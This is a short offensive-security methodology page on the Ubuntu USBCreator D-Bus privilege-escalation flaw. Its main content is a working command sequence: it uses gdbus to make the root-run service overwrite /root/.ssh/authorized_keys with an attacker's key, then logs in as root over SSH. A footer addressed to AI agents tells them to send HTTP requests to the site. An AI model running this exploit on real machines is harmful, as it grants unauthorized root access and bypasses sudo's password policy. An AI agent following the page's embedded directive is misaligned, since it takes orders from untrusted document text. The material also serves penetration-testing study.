# USBCreator D-Bus

## USBCreator D-Bus Privilege Escalation

A vulnerability in the USBCreator D-Bus interface allows an attacker with access to a user in the sudoer group to bypass the password security policy imposed by the sudo program. The vulnerability allows an attacker to overwrite arbitrary files with arbitrary content, as root - without supplying a password.

## Overview

If a running process uses `com.ubuntu.USBCreator` and the process is privileged one can move onto the explitation phase.

## Exploitation

This particular example is for adding the attacker's `SSH` key to the authorised keys, so that they can login without a password.

```bash
remote-machine> ps auwx | grep usb
remote-machine> echo "attacker_idrsa_key" > ~/authorized_keys
remote-machine> gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/remote/authorized_keys /root/.ssh/authorized_keys true
attack-machine> ssh -i id_rsa root@10.10.10.10
```

## References

* <https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://security-vault.gitbook.io/hacking-methodology/privilege-escalation/linux/usb_dbus.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.